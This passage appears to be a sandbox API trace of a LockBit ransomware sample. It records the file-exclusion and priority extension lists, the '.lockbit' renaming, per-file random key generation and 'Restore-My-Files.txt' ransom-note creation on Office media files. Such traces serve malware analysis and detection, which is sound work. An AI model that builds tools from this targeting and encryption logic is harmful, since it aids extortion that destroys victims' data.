lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.797] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.798] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.798] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF.lockbit") returned 70 [0197.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293234.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.800] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.800] malloc (_Size=0x40068) returned 0x3df0008 [0197.800] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1466) returned 1 [0197.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.800] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.800] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.801] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.801] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.801] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.806] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.806] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.806] free (_Block=0x1fa2ed8) [0197.806] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293234.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.807] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.807] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.807] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9af72900, ftCreationTime.dwHighDateTime=0x1bf16a4, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9af72900, ftLastWriteTime.dwHighDateTime=0x1bf16a4, nFileSizeHigh=0x0, nFileSizeLow=0x766, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293236.WMF", cAlternateFileName="")) returned 1 [0197.807] lstrcmpiW (lpString1=".", lpString2="J0293236.WMF") returned -1 [0197.807] lstrcmpiW (lpString1="..", lpString2="J0293236.WMF") returned -1 [0197.807] PathFindExtensionW (pszPath="J0293236.WMF") returned=".WMF" [0197.807] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.807] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.808] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.808] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293236.WMF") returned 1 [0197.809] lstrcmpiW (lpString1="ntldr", lpString2="J0293236.WMF") returned 1 [0197.809] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293236.WMF") returned 1 [0197.809] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293236.WMF") returned -1 [0197.809] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293236.WMF") returned -1 [0197.809] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293236.WMF") returned 1 [0197.809] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293236.WMF") returned -1 [0197.809] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.809] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF") returned=".WMF" [0197.809] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.809] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.809] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.810] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.810] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF.lockbit") returned 70 [0197.810] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293236.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.812] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.812] malloc (_Size=0x40068) returned 0x3df0008 [0197.813] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1894) returned 1 [0197.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.813] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.813] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.814] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.818] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.818] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.819] free (_Block=0x1fa2ed8) [0197.819] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293236.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.819] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.819] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.819] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9af72900, ftCreationTime.dwHighDateTime=0x1bf16a4, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9af72900, ftLastWriteTime.dwHighDateTime=0x1bf16a4, nFileSizeHigh=0x0, nFileSizeLow=0x78a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293238.WMF", cAlternateFileName="")) returned 1 [0197.819] lstrcmpiW (lpString1=".", lpString2="J0293238.WMF") returned -1 [0197.819] lstrcmpiW (lpString1="..", lpString2="J0293238.WMF") returned -1 [0197.819] PathFindExtensionW (pszPath="J0293238.WMF") returned=".WMF" [0197.819] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.819] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.820] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.820] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0293238.WMF") returned 1 [0197.821] lstrcmpiW (lpString1="ntldr", lpString2="J0293238.WMF") returned 1 [0197.821] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0293238.WMF") returned 1 [0197.821] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0293238.WMF") returned -1 [0197.821] lstrcmpiW (lpString1="autorun.inf", lpString2="J0293238.WMF") returned -1 [0197.821] lstrcmpiW (lpString1="thumbs.db", lpString2="J0293238.WMF") returned 1 [0197.821] lstrcmpiW (lpString1="iconcache.db", lpString2="J0293238.WMF") returned -1 [0197.821] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.821] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF") returned=".WMF" [0197.821] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.821] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.821] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.822] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.822] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF.lockbit") returned 70 [0197.822] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0293238.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.824] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.824] malloc (_Size=0x40068) returned 0x3df0008 [0197.824] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1930) returned 1 [0197.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.824] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.824] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.824] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.825] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.825] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.825] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.831] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.831] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.831] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.831] free (_Block=0x1fa2ed8) [0197.831] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0293238.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.831] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.831] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c285600, ftCreationTime.dwHighDateTime=0x1bf16a4, ftLastAccessTime.dwLowDateTime=0xbd61d940, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9c285600, ftLastWriteTime.dwHighDateTime=0x1bf16a4, nFileSizeHigh=0x0, nFileSizeLow=0x88e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0293240.WMF", cAlternateFileName="")) returned 1 [0197.831] lstrcmpiW (lpString1=".", lpString2="J0293240.WMF") returned -1 [0197.832] lstrcmpiW (lpString1="..", lpString2="J0293240.WMF") returned -1 [0197.832] PathFindExtensionW (pszPath="J0293240.WMF") returned=".WMF" [0197.832] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.832] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned 